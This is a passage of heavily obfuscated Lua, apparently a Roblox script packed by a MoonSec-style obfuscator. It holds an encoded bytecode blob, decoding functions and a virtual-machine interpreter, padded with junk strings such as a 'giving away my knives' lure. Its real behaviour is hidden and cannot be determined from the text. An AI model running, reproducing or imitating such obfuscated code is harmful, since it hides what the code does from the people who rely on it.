P381221v3OYo3BqY32fM3Bgg3lDU3eKe3bmy3FPg3k0T3cex2203jr63Lys3c312Bq3Bt73I6y35123mso3btA32g83b123DmV3mne103a9K29f3p0I3HR93P5231d53l893bM13mx33jmr3Opj1c3mE33lWN3Cvl3OxJ3bQz24X3HG13kFp3E2q3Jzd3MeZ3HL83Lq73lgy3j423LI53kL13K943icH34j13p3d3cr03GsP23g3h9q33vj28a33oJ2hF324w3kPb21e32wx3o723LNG3OfA3n973In93cpe21C1f34l53jYU33CC1W3iIS3bfT3nJC3N5222i3INo3OP93OPB2213inW3LHR3LR01B2Fw3BqS327424Q33c6329C31De24L3imO3Hg63I2R21f3gMw3mds3liq3OxF3bli1w3gyY2My3Ii91C34N527c2233ju23D6Q3CVV3loj3bp829e21w22K34Xc35bf2353iXF3PFP3pFP3PFR346g33FG3AK522021G3Mmy3D6Q3pg23PG42M222w2363l553pG02M23pGa29E3IR73PGg3pGl27c3Pgi3kvs3PGb2M235553ivM2F93pgu2L43PGU3PfR1C35SE2252373c2U34003dq12353ph422x3pH63pgJ3370152312GN23121G3PgE35bf3BP93PG83C8z3PH92Cn3phm33fg3pfY3bEp2gn22821n22631Kb3C1S337034j423723J3ajd3C1s3LRw1C3pi32hB3oKg3PHQ3Pfr1223F22p3pgD39OA3PIc29F3Pgd103pig3pII3pIK3PGe3pgN2gN3Ixd33rq23f230322k321c36Lh321f22t35822203NZf27X2233Jyk31163JYN3JYp33dN22O3jys3PeJ1i23h22F21624i3Pa131AZ3pa331b43H1l33cC22w21y336J3OqT348P32R7348r3l8p25D3E8L3OPe2IO2x33c3v3H7O3iz03kqR3h1y3F7f3FW73Ow83cm53f433Otq3j6t3L7L2GN3BWG3P9G3eoa3jk03k6t3HI03lOy356Z3hiA3Hic31793OVI3ha63gZ121h31X43Jls3cBu3o653N1627S3IW03Elr3lKC3L9t3nr53c1W3n153OnE3MPE3BJL1z3k0q3ER53Pl73P753En43P7731cF22533FI3p723FUi3bUM3IJt3n1P3hp23hN71F3PLC31063P763ATV3bdL33fI3iVd3c4r3HNI3FvR3pLn3j7C22L34vy3kRm3K0p3hwm3EoH34vy3aVC367F3J9r3myY3isU3MjI3c5i34ZI34D53KXx36Hp3Bkg2fr34Id3k2s3iGp3F6n3c0Q356z3Cs23K6B34ug34Yu36sz3IxD37F53gY63K7w356R34FY3Ou03D5t356x3Bu328h37F51o1y3Iaa3Iv62G3356c3PN23HyI2mY3nhu3P033bhn3KIU3p3n3Ksj32sY3IuT34vX3cbt3n2m3eCm3n2p388X3clj22z21934qr33833dsr3gWD35bB3BmB3bSJ3p123koY26o3D4e3Boc1g3Ei23oai331U3p5i34963kGm33Cc3pLn3Ear3G0Q3f4S3f473O693j9Y2EQ3obL113bZO3bm63CdB3dJY3po53JmR3GRu3p5I22m3eeA3Ii923c3pO73bqZ3C493Oah36Hs3poi27C3pLN3gh23OBj3G3U3D533DGy3hoc3bM43Pos3Pou33Cc3Kj03gIb29F"),(#U-((176-#("I am leaving CS:GO and giving away my knives. Hurry up pick some >> discord.gg moonsec"))));local function h(e,n,...)if(e==649001966)then return(t((((n)-712524)-48283)-454308,651343));elseif(e==535318271)then return(t((t(n,532693))-953992,780337));elseif(e==564342319)then return(t(t(t(t((n)-809594,296865),927552),613935),43812));elseif(e==29441446)then return(t(t(t(t(t(n,618809),187478),58628),749630),444115));elseif(e==444886261)then return(t(t(t(n,99112),563266),589440));elseif(e==758098103)then return(t((t(t((n)-159410,590005),34200))-149326,187340));elseif(e==348968146)then return(t((t(t(n,441476),264807))-433028,410125));elseif(e==704751908)then return(t(t((n)-456981,864009),437407));elseif(e==662495255)then return(t(t((t(n,149087))-973704,563789),813191));elseif(e==6368081)then return(((t(t(n,866127),204840))-512414)-114291);elseif(e==169158980)then return(t((t(n,831097))-644809,354191));elseif(e==744039523)then return(t(t(t((n)-899331,824498),511860),210714));elseif(e==719921999)then return(((t(t((n)-105393,981724),101810))-65440)-419936);elseif(e==61162758)then return(t(((t(n,126320))-897210)-173111,763974));end;end;local function n(e,n,...)if(e==368092490)then return((t((n)-359557,325867))-48376);elseif(e==542288315)then return(t(t(((n)-875318)-898375,756684),938282));elseif(e==552586562)then return(t((t(t((n)-284110,454956),537367))-617172,348425));elseif(e==612478771)then return(t(t(((n)-990936)-656442,817444),459996));elseif(e==380786844)then return(t((t(t(n,299714),942552))-861977,328504));elseif(e==566320159)then return(((t(t(n,505680),898718))-466263)-446974);elseif(e==898790465)then return(t(t(t(n,266356),186622),895227));elseif(e==219977209)then return(t((t(n,287019))-417109,333649));elseif(e==815270831)then return(t(t((t((n)-63330,229594))-414699,300509),743610));elseif(e==833311065)then return(t((t((t(n,297907))-280987,154130))-297443,526445));elseif(e==988787140)then return(t(t((t(n,474590))-116375,305977),813615));else end;end;if _ENV then _ENV._ENV=_ENV end;local n=c[((#{258;511;(function(...)return 825;end)()}+902627201))];local i=c[((#{528;785;193;579;(function(...)return 654,591,300;end)()}+708256300))];local B=c[((#{468;429;120;753;}+458835296))];local d=c[(21591876)];local A=c[((148932297-#("MoSattout")))];local m=c[(140361372)];local r=c[(719847174)];local l=c.H0Qwk0iE0P;local function u(n,e,o)if(o)then local e=(n/d^(e-l))%d^((o-l)-(e-l)+l);return(e-(e%l));else local e=d^(e-l);return(((n%(e+e)>=e)and(l))or(i));end;end;local function i()local l,x=g(E,o,o+d);l=t(l,e);e=l%n;x=t(x,e);e=x%n;o=o+d;return((x*n)+l);end;local function d()local l,c,d,x=g(E,o,o+A);l=t(l,e);e=l%n;c=t(c,e);e=c%n;d=t(d,e);e=d%n;x=t(x,e);e=x%n;o+=B;return((x*m)+(d*r)+(c*n)+l);end;local function r()local x=t(g(E,o,o),e);e=x%n;o=(o+l);return(x);end;local S="\35";local function m(...)return({...}),T(S,...);end;local function z(...)local z=c["yk32jm"];local B=c.Uv2DvdPtjL;local w=c[((#{737;197;700;(function(...)return 732,297;end)()}+148932283))];local F=c["n0g3HPx"];local A=c[((#{346;513;371;}+21591873))];local T=c[(905724386)];local U=c[((#{990;382;490;957;(function(...)return;end)()}+273309998))];local L=c[((477086961-#("This obfuscation string was sponsored by NordVPN, the easiest way to protect yourself from nonexistent cyber threats.")))];local n=c.H0Qwk0iE0P;local Q=c[((1182000-#("faint#6969 is a big skid. wait..")))];local m=c[(902627204)];local _=c['x1SUAZt0'];local h=c["UXdoTN"];local P=c[(343335124)];local y=c[((921334553-#("Remember when psu messed with ms? ok fed is now head management")))];local q=c[(353214665)];local C=c[((458835395-#("sometimes, I put vegetable oil all over my body and slide around my house as if I was a penguin")))];local W=c[((#{655;}+258153758))];local S=c[((791106669-#("cockie")))];local l=c[(708256307)];local function v(...)local s=({});local c=({});local I=({});local Z=r(e);for f=l,x(d,e)-n,n do local i=r(e);if(a(i%h,A))then local e=r(e);c[f]=(e~=l);elseif(a(i%h,C))then while(true)do local d=x(d,e);if(a(d,l))then c[f]=('');break;end;if(V(d,U))then local l,a=(''),(b(E,o,D(o,d)-n));o=o+d;for n=n,#a,n do local n=x(t,g(b(a,n,n)),e);e=M(n,m);l=l..p[n];end;c[f]=l;else local n,l=(''),({g(E,o,N(o+d,n))});o=o+d;for o,l in H(l)do local l=t(l,e);e=M(l,m);n=n..p[l];end;c[f]=n;end;break;end;elseif(i%h==l)then while(true)do local e=d(e);c[f]=x(b,E,o,D(o,e)-n);o=D(o,e);break;end;elseif(M(i,h)==B)then while(true)do local o=d(e);local e=x(d,e);local t=n;local d=D((k(u(e,n,_),(A^P))),o);local o=u(e,h,q);local e=(G((-n),x(u,e,P)));if(a(o,l))then if(a(d,l))then c[f]=x(O,e*l);break;else o=n;t=l;end;elseif(o==z)then c[f]=(d==l)and(k(e,(j(n,l))))or(k(e,(l/l)));break;end;local e=k(x(Y,e,o-T),(D(t,(j(d,(A^W))))));c[f]=a(e%n,l)and O(e)or e break;end;else c[f]=nil end;end;local o=d(e);for e=l,N(o,n),n do s[e]=({});end;for g=l,o-n,n do local o=r(e);if(o~=l)then o=o-n;local p,h,t,f,E,m=l,l,l,l,l,l;local b=u(o,n,w);if(a(b,B))then elseif(b==A)then f=(x(i,e));t=s[(d(e))];E=(r(e));elseif(a(b,n))then f=(i(e));t=(d(e));E=(x(r,e));elseif(a(b,y))then h=(i(e));f=(i(e));t=(x(d,e));E=(x(r,e));m=({});for o=n,h,n do m[o]=({[l]=r(e),[n]=x(i,e)});end;elseif(a(b,w))then h=(i(e));f=(i(e));t=s[(d(e))];E=(x(r,e));elseif(a(b,l))then h=(x(i,e));f=(i(e));t=(i(e));E=(r(e));end;if(a(u(o,y,y),n))then t=c[t];end;if(u(o,F,F)==n)then p=s[x(d,e)];else p=s[g+n];end;if(u(o,B,B)==n)then h=c[h];end;if(u(o,C,C)==n)then f=c[f];end;if(u(o,S,S)==n)then m=({});for e=n,r(),n do m[e]=x(d);end;end;local e=s[g];e[-L]=E;e["PGMfo"]=h;e['ZYTnpfszD8']=p;e['SuUZMlo2']=t;e["BPY"]=m;e['suSezrg']=f;end;end;local o=i(e);for e=l,d(e)-n,n do I[e]=v();end;return({[Q]=s;["Dyg"]=l;['pnyFT']=I;['vSk4s']=Z;["SWbtuPFJup"]=o;["bJMkTGTqSe"]=c;});end;return(v(...));end;local function B(e,u,i,...)local n=e["bJMkTGTqSe"];local r=e['SWbtuPFJup'];local g=e[814111];local C=i['\86\101\99\116\111\114\51'];local a=e["vSk4s"];local b=0;local D=e["pnyFT"];return(function(...)local w="BPY";local d='PGMfo';local o='SuUZMlo2';local n={};local E=-(1);local e=(true);local l='suSezrg';local p={...};local x="ZYTnpfszD8";local e=(222440921);local A=({});local k=(T(S,...)-1);local b=g[b];local g={};local F=-841110;local e=C and 1 or 0;for e=0,k,e do if(e>=a)then g[e-a]=p[e+1];else n[e]=p[e+1];end;end;local p=k-a+1;repeat local e=b;local a=e[F];b=e[x];if(a<=h(744039523,1451498))then if(a<=h(662495255,1148928))then if(a<=((f[71801169])or(c[839102444](t(820110253,821734643),t,f,71801169))))then if(a<=h(t(927070384,c.ck1ee9L4Bn),t(453966094,c['ck1ee9L4Bn'])))then if(a<=((f[90887663])or((function(e)f[90887663]=t(t(t(((e)-857393)-789530,58602),763095),853088);return(f[90887663]);end)(t(258799675,259235217)))))then if(a<=t(449292245,449292245))then local x=n[e[d]];if(not(x))then n[e[l]]=x;b=e[o];end;elseif(a==h(719921999,637728))then elseif(a<=((f[332211144])or(c[200244934](t(453334231,c.ck1ee9L4Bn),t,f,332211144))))then n[e[l]]=y(256);end;elseif(a<=((f[8917921])or(c[874467716](t(187852324,188063105),t,f,8917921))))then if(a==((f[93779580])or(c[841182038](t(830326106,c[125643710]),t,f,93779580))))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];local h;local f;local a;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for x=0,29 do if t(3020,7145+x,2082)>1041 then if t(8813,2618+x,3536)<1768 then if t(8889,1461+x,1146)<573 then else end else if t(5681,2837+x,2236)>=1118 then else end end else if t(5264,2391+x,3852)<=1926 then if t(2234,5370+x,1056)>=528 then n[a]=f;else end else if t(2164,8842+x,3466)<1733 then a=e[h];else h=l;end end f=e[o];end end n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];elseif(a<=h(t(34359959,63797041),t(454959697,c['ck1ee9L4Bn'])))then n[e[l]]=n[e[o]]*e[d];end;elseif(a==t(618532474,618532479))then n[e[l]]=e[o]-n[e[d]];elseif(a<=((f[567138175])or((function(e)f[567138175]=t((t(((e)-991380)-797596,834213))-779197,547048);return(f[567138175]);end)(t(574813861,c[253204386])))))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];end;elseif(a<=h(744039523,1451481))then if(a<=h(t(852701047,c[125643710]),1708111))then if(a>h(t(909603940,c['ck1ee9L4Bn']),988390))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local E;local b;local h;local f;local a;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for x=0,34 do if t(7245,7768+x,2514)>1257 then f=E[h];if t(8876,4012+x,1552)>776 then if t(3925,6784+x,1772)<=886 then n[e[l]]=#n[e[o]];else end else if t(7875,3304+x,1126)<=563 then a=e[b];else end n[a]=f;end else E=i;if t(5888,2305+x,3858)<1929 then if t(3030,4401+x,954)<=477 then n[e[l]]=e[o]-e[d];else end else if t(1255,1253+x,608)>=304 then else b=l;end h=e[o];end end end n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]][e[o]]=n[e[d]];e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];elseif(a<h(t(499637353,497481528),t(608110206,607682816)))then local l=e[l];n[l](s(n,l+1,e[o]));for e=l+1,r do n[e]=nil;end;end;elseif(a==h(t(756596438,784202704),t(577451179,c[253204386])))then local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=n[e[o]];e=e[x];local c=e[o];local t=n[c];for e=c+1,e[d]do t=t..n[e];end;n[e[l]]=t;e=e[x];local d=e[l];local t,o=m(n[d](s(n,d+1,e[o])));E=o+d-1;local o=0;for e=d,E do o=o+1;n[e]=t[o];end;e=e[x];local l=e[l];n[l]=n[l](s(n,l+1,E));for e=l+1,E do n[e]=nil;end;e=e[x];e=e[x];elseif(a<=((f[691256006])or((function(e)f[691256006]=(((e)-724297)-272623)-324207;return(f[691256006]);end)(t(417209944,415905513)))))then local l=e[l];do return n[l](s(n,l+1,e[o]))end;end;elseif(a<=h(t(698791423,100635036),t(70165071,70813596)))then if(a>((f[855808535])or((function(e)f[855808535]=t((((e)-996952)-23409)-618100,437203);return(f[855808535]);end)(t(511074942,c[165995577])))))then n[e[l]]();elseif(a<h(704751908,1211567))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];local u;local b;local h;local f;local a;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=2,31 do if t(2587,5155+x,3550)>1775 then if t(6386,9536+x,458)>=229 then if t(4445,9353+x,3096)<1548 then else end else f=u[h];if t(4273,2650+x,1428)>=714 then a=e[b];else end end n[a]=f;else if t(1239,5145+x,3044)<=1522 then if t(6022,1309+x,1454)<=727 then n[e[l]]=#n[e[o]];else end else if t(9009,7552+x,2652)<=1326 then u=i;else h=e[o];end b=l;end end end n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];local s;local r;local a;local f;local h;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for x=2,28 do if t(5870,1038+x,3920)<1960 then if t(5264,7772+x,1616)<=808 then if t(3903,4511+x,346)>=173 then a=e[o];else end f=s[a];else if t(1285,7381+x,2592)>1296 then else r=l;end end else if t(3450,2431+x,3778)>1889 then if t(2928,1490+x,2454)>=1227 then s=i;else end else h=e[r];if t(5502,5091+x,2636)>=1318 then else n[h]=f;end end end end n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];end;elseif(a>h(t(695802485,85999126),t(828395429,c[125643710])))then n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];elseif(a<14)then local l=e[l];local o,e=m(n[l](s(n,l+1,e[o])));E=e+l-1;local e=0;for l=l,E do e=e+1;n[l]=o[e];end;end;elseif(a<=h(29441446,458387))then if(a<=t(542636604,542636589))then if(a<=h(169158980,233520))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]][e[o]]=n[e[d]];e=e[x];e=e[x];elseif(a==((f[136052152])or((function(e)f[136052152]=t((t(((e)-901837)-361177,643848))-79207,591477);return(f[136052152]);end)(t(811414320,810163546)))))then e=e[x];local o=e[l];E=o+p-1;for e=0,p do n[o+e]=g[e];end;for e=E+1,r do n[e]=nil;end;e=e[x];local l=e[l];do return s(n,l,E);end;e=e[x];e=e[x];elseif(a<=h(535318271,1201789))then local a;local f;local i;local r;local u;local h;local c=0;local m=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for x=1,32 do if t(8709,8174+x,3814)<1907 then if t(1406,5554+x,1494)>747 then a=e;if t(3173,4539+x,424)>212 then f=o;else end else if t(1653,7379+x,2864)>=1432 then else end end else i=l;if t(6010,2620+x,2126)>=1063 then if t(5499,1957+x,1182)>=591 then if m~=1 then n[h]=u;m=1;end;else u=r[a[f]];end h=a[i];else if t(1471,5081+x,3408)<1704 then if(e[l]~=e[d])then b=b+1;else b=e[o];end;else r=n;end end end end n[e[l]]=e[o];e=e[x];local d=e[l];do return n[d](s(n,d+1,e[o]))end;e=e[x];local l=e[l];do return s(n,l,E);end;e=e[x];e=e[x];end;elseif(a<=19)then if(a>t(383419344,383419330))then local e=e[l];n[e](s(n,e+1,E));for e=e+1,E do n[e]=nil;end;elseif(a<h(t(205241620,c[61679461]),t(590634462,c[695852875])))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];end;elseif(a==h(t(59973427,c[454240379]),1451467))then if(n[e[l]]~=e[d])then b=e[o];end;elseif(a<=h(t(22396378,188781726),233498))then if(n[e[l]]==n[e[d]])then b=e[o];end;end;elseif(a<=((f[780400255])or((function(e)f[780400255]=t((t(e,185445))-389159,844805);return(f[780400255]);end)(t(68388578,67339972)))))then if(a<=((f[698836282])or((function(e)f[698836282]=t(t(((e)-665921)-838098,840806),177774);return(f[698836282]);end)(t(204152797,202263279)))))then if(a==t(106130755,106130773))then b=e[o];elseif(a<=h(t(82874924,c.ck1ee9L4Bn),t(610518343,c.cN2mXrfEeC)))then local a;local f;local s;local h;local E;local u;local c=0;local m=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for x=1,25 do if t(5690,8349+x,378)>=189 then if t(5512,8730+x,2414)<=1207 then if t(2006,3277+x,638)<319 then b=e[o];else a=e;end f=o;else if t(5090,7782+x,1642)<821 then E=h[a[f]];else end u=a[s];end else if t(9104,4984+x,1684)>=842 then if t(5383,3077+x,3514)<=1757 then s=l;else end else if t(2005,1082+x,304)>=152 then if m~=1 then n[u]=E;m=1;end;else end end h=n;end end local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=#n[e[o]];e=e[x];n[e[l]]=n[e[o]]+e[d];e=e[x];local u;local h;local f;local s;local a;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=2,31 do if t(5739,3275+x,3084)<=1542 then if t(7063,9650+x,2876)>=1438 then if t(1260,6707+x,2090)<1045 then a=e[h];else n[a]=s;end else if t(4771,3700+x,2040)<=1020 then else u=i;end end h=l;else if t(4238,8353+x,2048)<1024 then if t(8682,8287+x,3924)>1962 then n[e[l]]=n[e[o]];else end else if t(6057,5188+x,3142)>=1571 then else f=e[o];end s=u[f];end end end n[e[l]]=n[e[o]];e=e[x];local t=e[l];n[t]=n[t](n[t+1]);for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]][n[e[o]]]=n[e[d]];e=e[x];e=e[x];end;elseif(a==((f[613141030])or((function(e)f[613141030]=t(t(((t(e,169039))-31700)-102548,284323),766160);return(f[613141030]);end)(t(368033080,c[764945195])))))then if(not(n[e[l]]))then b=e[o];end;elseif(a<=((f[557065301])or((function(e)f[557065301]=t((t((t(e,531238))-938600,649083))-84234,765581);return(f[557065301]);end)(t(855890877,857252822)))))then if(n[e[l]]==e[d])then b=e[o];end;end;elseif(a<=h(t(792457076,c[289978309]),1148934))then if(a==h(61162758,1708093))then local r;local a;local f;local c;local t;local x=0;local function d(n,e,l)e=(x+e)%3 x=((e~=0)and x+((e<2)and n or-n)or x*n)%l return x end for x=1,26 do if d(2111,8162+x,1070)>535 then t=e[a];if d(3135,1136+x,1922)>=961 then n[t]=c;if d(7346,5876+x,1920)<=960 then else end else if d(1792,5680+x,2376)<=1188 then else end end else if d(3852,2984+x,2338)<1169 then if d(7341,8269+x,2378)>=1189 then r=i;else end else f=e[o];if d(5488,3533+x,3918)<=1959 then c=r[f];else end end a=l;end end elseif(a<=((f[5817476])or((function(e)f[5817476]=t((t(t(e,312664),827580))-107943,666811);return(f[5817476]);end)(t(60568700,60785631)))))then local d=e[l];local o={};for e=1,#A,1 do local e=A[e];for l=0,#e,1 do local e=e[l];local x=e[1];local l=e[2];if((x==n)and(l>=d))then o[l]=x[l];e[1]=o;end;end;end;end;elseif(a==t(590600833,c[695852875]))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local f;local a;local h;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and-n or n)or c*n)%l return c end for x=1,30 do if t(4908,6608+x,2084)<=1042 then if t(9052,4013+x,940)<470 then if t(6495,6157+x,2786)<=1393 then f=l;else h=e[f];end else if t(2893,9796+x,3346)>=1673 then n[e[l]]=n[e[o]]+e[d];else n[h]=a;end end else if t(7542,3961+x,3278)>=1639 then if t(2159,9044+x,908)>454 then else end else if t(9983,4731+x,1550)>=775 then a=e[o];else end end end end n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local a;local h;local f;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=1,32 do if t(6057,7890+x,2266)<=1133 then if t(2112,8167+x,1672)>836 then if t(1109,1347+x,2710)>1355 then else end else if t(5749,3967+x,312)<=156 then else a=l;end end else if t(8358,1435+x,1798)>=899 then if t(4432,2713+x,2244)>1122 then h=e[o];else end f=e[a];else if t(3771,3473+x,2440)>1220 then n[f]=h;else end end end end local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];local i;local f;local a;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for x=0,32 do if t(2647,9631+x,344)<172 then a=e[i];if t(4418,7972+x,1940)<=970 then if t(9614,1595+x,1780)<=890 then n[a]=f;else end else if t(3096,8248+x,3422)>=1711 then else end end else if t(6121,8017+x,2104)>1052 then if t(6973,1132+x,1010)>=505 then else if(n[e[l]]==e[d])then b=b+1;else b=e[o];end;end else if t(1347,9573+x,2596)<=1298 then else i=l;end end f=e[o];end end local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];elseif(a<=t(414265888,414265917))then local l=e[l];n[l]=n[l](s(n,l+1,e[o]));for e=l+1,r do 